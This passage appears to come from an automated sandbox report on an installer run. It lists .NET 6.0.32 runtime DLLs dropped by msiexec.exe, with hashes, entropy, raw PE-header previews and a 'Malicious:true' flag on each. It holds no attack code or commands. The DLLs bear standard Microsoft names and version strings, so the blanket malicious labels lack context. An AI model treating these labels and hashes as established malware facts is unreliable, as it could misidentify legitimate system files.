                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...-a............" .........$...............................................@......[.....`...@......@............... ......................................@W..p.... ...)...0.......#..T...............................................................H............text............................... ..`.data...n........ ..................@....reloc.......0......................@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.........C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Claims.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):94368
                                                                                                                                                                                                                                        Entropy (8bit):6.447995362526241
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:HeNGF95xttKvsq85yOuX3upafbqb958kGOQwQ7rzUU3q2bP6MOVK1iKmVzk:HeIF95VKscOuX3upEbqfyOVoOY
                                                                                                                                                                                                                                        MD5:649F20AA9F4B7DD23EB7160023B0A56E
                                                                                                                                                                                                                                        SHA1:A553D8B8A1EC4696616BC9D34CB33ED9AEBBB04C
                                                                                                                                                                                                                                        SHA-256:6E6FFD7211B25A806A466B48A729818A7A7592570D2BF926B8AC04D078220102
                                                                                                                                                                                                                                        SHA-512:C84C26A99CBF44831776F8CE7739112F385F779DEAF7F2256D4824EAF1BC013D6EE18B7B92F24B4D2257FED87ECBA8EB6BB1209795FC240D752FD2B5386F9641
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....<..........." .....4...................................................p.......6....`...@......@............... ......................................$-..<....H...(...`..<...p...T...............................................................H............text...T2.......4.................. ..`.data...!....P.......6..............@....reloc..<....`.......F..............@..B............................................0...........................<.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o...x.....0.0.0.0.0.4.b.0...F.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...S.e.c.u.r.i.t.y...C.l.a.i.m.s.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...V.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....S.y.s.t.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.Algorithms.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):808712
                                                                                                                                                                                                                                        Entropy (8bit):6.667176908618659
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:p9Dux8VLSQjVqSlDrd571xOEc8wRBul3v8x5d4BSV:ptux8VLSQjVqSlDrd5n+BuZEx5d4BK
                                                                                                                                                                                                                                        MD5:A266B1B3765863C6F80A8A7DA92EBE06
                                                                                                                                                                                                                                        SHA1:2CE8B15DA8CEC846F447B7A1E3486883784DA143
                                                                                                                                                                                                                                        SHA-256:19595880A932FC70CBF4DC31C122E3341DFA6CFB9E3EE9999D66D861C4B03F66
                                                                                                                                                                                                                                        SHA-512:E01C2F91C20361D105CFF994E62D1AAC1D7788884F3DD076BEE287503958F23F182B60A7A5C7094B387711BC0B2032AF8A2D31FC8408D85B2DF91A0BFC85767E
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...q=i..........." .........................................................@......[.....`...@......@............... ......................................L)...Y.......)...0..$....C..T...............................................................H............text............................... ..`.data...#~..........................@....reloc..$....0......."..............@..B............................................0.......................|...4.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o...p.....0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.Cng.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):486560
                                                                                                                                                                                                                                        Entropy (8bit):6.689433219916561
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:D0pdtbsk7ZTs0ilUfa0BEuUWZwgZExhelA1z:+DNTvih0BEuUWCgZExhxz
                                                                                                                                                                                                                                        MD5:01DA5B74F8CEA47CCDD769EA34B2E7E7
                                                                                                                                                                                                                                        SHA1:A9D2B1983176ADA553B4B608F2F5515432718425
                                                                                                                                                                                                                                        SHA-256:7B5C8CB2871FA9C53F20CB5316906CDD610357C904734C1E4B5BCC738FA29CB2
                                                                                                                                                                                                                                        SHA-512:9C260DF60E5F631751C2761E58A27D019E3515AF594C44557B36EA9A3CCCB976014C3767ED680637EFDA20D0EE77FC38ABBD7EF94186E17B3BE27D9566B10DF5
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....]............" .........Z...............................................p............`...@......@............... ..................................h........2...D...(...`......P0..T...........................................................h...H............text...5........................... ..`.data....P.......R..................@....reloc.......`.......<..............@..B............................................0.......................X.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........p.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...L.....0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.Csp.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):189600
                                                                                                                                                                                                                                        Entropy (8bit):6.633371366781308
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:JNEmWBQH04BekCQUVP2xrwOy09JN/KBWAUQ335BotelqKaMJDBy/x9u:/WBQ3E1kjUBoteJM/xI
                                                                                                                                                                                                                                        MD5:73744EEF11A5BD7096F5AB01661A1CF1
                                                                                                                                                                                                                                        SHA1:772C4483635EC0A417139F8955A943D3D02BBBC9
                                                                                                                                                                                                                                        SHA-256:8FA0C869538128A9FB2A95AFA1ECF51D43A955A0EF719D9613E420DEDDBC3448
                                                                                                                                                                                                                                        SHA-512:14E14D4680AA4EB6F1AB2F0679B3B4E4B67EB012D32D03BE51DD116B0264547077C78F41DDA1504B9C048FC17158BFA763A363A5A8C1115B3905E4513FF890BC
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....b............" .....................................................................`...@......@............... ..................................h...lO..X........(..........."..T...........................................................h...H............text.............................. ..`.data....).......*..................@....reloc..............................@..B............................................0.......................X.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........p.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...L.....0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.Encoding.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):93856
                                                                                                                                                                                                                                        Entropy (8bit):6.408085753053331
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:9EhT10RdVH8EOY7wmlYcNLyoOeSRzmIevYcfiLrszHc:92SGEOY7K8LyheSRzmdvYqEAA
                                                                                                                                                                                                                                        MD5:081BA64231096D11B96E241626C3EFED
                                                                                                                                                                                                                                        SHA1:BA4F7864F8465DE68F6DE98B96FBE6E7444C1B1D
                                                                                                                                                                                                                                        SHA-256:B661157A26DACAAF86E88AA9E7443BA9FC19D1322B9E262B0A032320666B5E57
                                                                                                                                                                                                                                        SHA-512:4DCEAF18F9460650B7DB30FDC9A3CDF512FB9B97B482ABB0CCE54411B4A0572602F8337D4ACDB699CEB268DE11FA791B1D352276EF79AB71ABFD81BCB09ED9CA
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...Q............" .....&...................................................p......5.....`...@......@............... .......................................*..\....F...(...`..(.......T...............................................................H............text...C%.......&.................. ..`.data........@.......(..............@....reloc..(....`.......D..............@..B............................................0.......................p...(.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o...d.....0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.OpenSsl.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32032
                                                                                                                                                                                                                                        Entropy (8bit):6.245677631794701
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:M9WAmDijRWtbwPV0D/F/pQ+1+HCeqtwlLYmxNOcVPFNNPUHX6HRN78FRxB+R9zr8:uyeqylLYm71VPRc3W8FRxw9zb0
                                                                                                                                                                                                                                        MD5:7F6966066BECB9A1F73DA461E07A036E
                                                                                                                                                                                                                                        SHA1:D983B4C573D241577E4CD7938CF6003D11B2D8CC
                                                                                                                                                                                                                                        SHA-256:7A9399BCAD3997D9CEAD01BDD689D3B92DC68E01601446510F2BDD9B4C3BF8A7
                                                                                                                                                                                                                                        SHA-512:13313E6EEC899B4B500501A866BE5742743C78AA6252270399DEBAE200A9D88ABF5DEC10ECF3BC8850629F2BE20F7B45D71654799418E3478A14271936846EE7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....{............" .....N................................................................`...@......@............... ......................................@........T.. )...p..........T...............................................................H............text...'L.......N.................. ..`.data........`.......P..............@....reloc.......p.......R..............@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...b.%...C.o.m.m.e.n.t.s...S.y.s.t.e.m...S.e.c.u.r.i.t.y...C.r.y.p.t.o.g.r.a.p.h.y...O.p.e.n.S.s.l.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...r.%...F.i.l.e.D.e.s.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.Primitives.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):134928
                                                                                                                                                                                                                                        Entropy (8bit):6.568383371998579
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:sspRk/BZX3krpmsUjMM+JbVUonV0hcbGWbrrrrrrrrrrrrrrrrrrrrrrrrrrrrr+:9RMBZXCPMRcbGnt5Yq
                                                                                                                                                                                                                                        MD5:A66428FFBD2EBDED73C9BC8A8D0A76B4
                                                                                                                                                                                                                                        SHA1:988AAC80A437781CDE6596CC654DB9776FF4AD84
                                                                                                                                                                                                                                        SHA-256:914CD0D9270A667393FC5F0F6E558887D18510466B42FF4DDAA0DB415DC3AE2A
                                                                                                                                                                                                                                        SHA-512:B7B20F4ED2630B9AB9F451A64D3FD9E82DD2AB64FB33B66BF01BA239C22214AD0A895C05DA2571BF6C46B7E3FD73E4609626E3EDBFCE08C0591F5F2D03E65E16
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................." .........(......................................................<.....`...@......@............... .......................................;...........)......d.......T...............................................................H............text...T........................... ..`.data....".......$..................@....reloc..d...........................@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...h.(...C.o.m.m.e.n.t.s...S.y.s.t.e.m...S.e.c.u.r.i.t.y...C.r.y.p.t.o.g.r.a.p.h.y...P.r.i.m.i.t.i.v.e.s...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...x.(...F.i.l.e.D.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Cryptography.X509Certificates.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):569104
                                                                                                                                                                                                                                        Entropy (8bit):6.706114555400102
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:dcy1XS6la/9irY6jyFOagRMb2HwpYDgP7xmBVWUw7nzNZZmbS:1XSgw9A6YDgP7xmfWUwrTEbS
                                                                                                                                                                                                                                        MD5:7ED212CA1B7E3CECDE6B278B6A7B960B
                                                                                                                                                                                                                                        SHA1:8280B9E10FCB9263A3112E43C80F988F8CECE77A
                                                                                                                                                                                                                                        SHA-256:FAF2D2080ACB553C9BF44796F2A5DFD2FD9B4D5C273A940266EFF26D6677CD02
                                                                                                                                                                                                                                        SHA-512:6E5D79A1EF29DFA58242BF52154EE0A19338ECDFD064A250056FA46F5195CBBF96DF785B1AFEF689C41BECDD75BC420C1E7EF47102861026F951A8966E688A62
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................." ................................................................v.....`...@......@............... ......................................`...@8.......)..........x4..T...............................................................H............text............................... ..`.data...............................@....reloc...............z..............@..B............................................0...........................X.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Principal.Windows.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):151816
                                                                                                                                                                                                                                        Entropy (8bit):6.6623046410034386
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:stiUGF+5xnwtF9cOtyeyvsuA1Hp7cyeo7Y3pN:OGAeSwasumLYL
                                                                                                                                                                                                                                        MD5:ACBCB2A44205E6CA75E4084C1CB1CFF5
                                                                                                                                                                                                                                        SHA1:846E040AB6E325EBA69A26C0B89BF9C018D5AE65
                                                                                                                                                                                                                                        SHA-256:56E35F6ACFBA99205CF2F27E9834B0B726CBCCA38A122C6CFE1ACDE1E398AC3D
                                                                                                                                                                                                                                        SHA-512:7C956DFE6C668C1466BC59F4F11A4C39325C3274B2198BEC979F3A2505BED08D16474E57843CD90ABBA930F9634A8D437CFB10FFBD9F3263C61E9344D0E1659F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...]............." .........$...............................................P......P.....`...@......@............... ..................................h....F.......(...)...@......x...T...........................................................h...H............text...e........................... ..`.data...U.... ... ..................@....reloc.......@.......$..............@..B............................................0.......................X.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........p.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...L.....0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.Principal.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15520
                                                                                                                                                                                                                                        Entropy (8bit):6.823849132456246
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:n8V/1Wi4fWcYA6VFHRN7ABmo8R9zMLWN+:nIY7FCl2moQ9zPs
                                                                                                                                                                                                                                        MD5:16DAC3D892053EF71C67B2C9BDC7F403
                                                                                                                                                                                                                                        SHA1:EB39F7E2AED3922FB475B2B0CF39ED5BC16A1168
                                                                                                                                                                                                                                        SHA-256:73CF3680065CBCF6D27EB607CEF08704763EC18280F139D973F4BFC6E6C3E508
                                                                                                                                                                                                                                        SHA-512:0FD4172EAC020227EDF2AB1A79C790364789C0595E5AC215F8E21527EACCED64F901777BBC30E321D68344F7DEC9E3046C479BECD8276ED2FD7ED8A59BA98444
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"!..0..............)... ........@.. ..............................J.....`..................................)..S....@...................(...`.......(..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H........ ......................P ......................................Ms.C"/.Y.H....5 ;1.......cO.Y...1...r.L.P.F....."..{F.d...;.ek!m...H..vA.oa.........[.z.j.OT^.[.......*..:..%.>t.F..M..=PBSJB............v4.0.30319......`.......#~..X.......#Strings....X.......#GUID...h.......#Blob......................3......................................F........."...........;...........f.......d.................k...!.k.....k...[.k.....k.....k.....k...B.k...O.k...v.............

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.SecureString.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):15520
                                                                                                                                                                                                                                        Entropy (8bit):6.809520266690687
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:1eraiTW1A3WxYA6VFHRN7ectHNsAR9z/y9R:1eraO+FCleCts89z69R
                                                                                                                                                                                                                                        MD5:B2332732ED17ACFCF4F331606CFD5B40
                                                                                                                                                                                                                                        SHA1:96455F14473711B41FC7F9E609E275010445E241
                                                                                                                                                                                                                                        SHA-256:DA85E41265986C66CFC87A6147AD6F699BE06E17318CC7228E5BC06782AAB803
                                                                                                                                                                                                                                        SHA-512:C5B85177A18DB48D74D2786F8B943D8104DAE3E30CBC6218C9834C93E8246F14D90B7428C0553B52A735AA5585A28983D8EF52018817BBC56C4D68CAA569CB54
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....N..........."!..0..............)... ........@.. ...............................|....`..................................)..K....@...................(...`.......(..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H........ ......................P .......................................k.}.....@.....pg..N.e.W.=..8A.1..P!Mo..U.....GI{..K.o...@;^.......U.I.aYS.I.WB.4....p.80.6.....g..D....ov(.....>.gh>w4!EBSJB............v4.0.30319......`.......#~..P.......#Strings....4.......#GUID...D.......#Blob......................3......................................2.....................3.r.........^.......S.................Z.....Z.....Z...S.Z.....Z...w.Z.....Z...:.Z...G.Z...n.............

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Security.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):18720
                                                                                                                                                                                                                                        Entropy (8bit):6.611731936380794
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:6+rueDWLr3WssDW5kpX6HRN7nd9R9zmwj+:weDW/0MyWl9zLj+
                                                                                                                                                                                                                                        MD5:7222BD0ED170B937B857CDA48DF38B29
                                                                                                                                                                                                                                        SHA1:EDE40D82947E7139CB96AD5E941D193AB8D25116
                                                                                                                                                                                                                                        SHA-256:91B24F7E448513335225FF739391C30CF398DFBCA53D704BD3026AD174EAC7E2
                                                                                                                                                                                                                                        SHA-512:0A20F683926A7328C74CA5552FAEFB12348DDBCD4347B32AC17A0F26FC7641C66654CEB72951338C2AD7420E097A238F62CFA372B45A1DA81EDCD8DDCA88F1A3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2!..........." ..0.............^5... ...@....... ..............................A.....`..................................5..O....@..X............ .. )...`......44..T............................................ ............... ..H............text...d.... ...................... ..`.rsrc...X....@......................@..@.reloc.......`......................@..B................?5......H.......P ..d....................3......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......H...#Blob............T.........3....................................O.................p...~.p.....;...............O.=.....}.....}...e.}.....}.....}...'.}...D.}.....}.....}...n.................7.p.................'.....'.....'...).'...1.'...9.'...A.'...I.'...Q.'...Y.'...a.'...i.'...q.'...y.'.....'. ...'.....'...

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ServiceModel.Web.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17688
                                                                                                                                                                                                                                        Entropy (8bit):6.6159722799904985
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:RiSEs6760DX88kgHWGlK5WDWVWxNzx95jmHnhWgN7acWcqcADB6ZX01k9z3AvB2Y:Rx4HWyK5Wi2X6HRN7HqcTR9zi2ep
                                                                                                                                                                                                                                        MD5:0BE0FC7792DD4107FACCBB6C5E819429
                                                                                                                                                                                                                                        SHA1:7CE6C761D7197927B0C9B670B25F95FBA8677008
                                                                                                                                                                                                                                        SHA-256:9FC7DB5B190DDADA2AD2B2C5C0B428D14CD107A868B0B0D06BF83D7E4B2B1187
                                                                                                                                                                                                                                        SHA-512:50AF80A385BCE161506892B1FF136AD28C4AAFD18B27475F1362FE4FD0CA5583B00F3D1400E2CE0BBD1C6526793596500F8C90B6F4FC60E25687BCDFE91D3F2A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....`Q..........." ..0..............0... ...@....... ..............................;.....`................................../..O....@...................)...`..........T............................................ ............... ..H............text... .... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................./......H.......P ......................`.......................................BSJB............v4.0.30319......l.......#~......,...#Strings............#US.........#GUID.......P...#Blob............T.........3....................................&.................................%.....?.....^.......S.....S...t.S...+.S.....S...X.S...u.S.....S...(.S...D.H.....H.........F.......{...........................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y......... .............

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.ServiceProcess.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
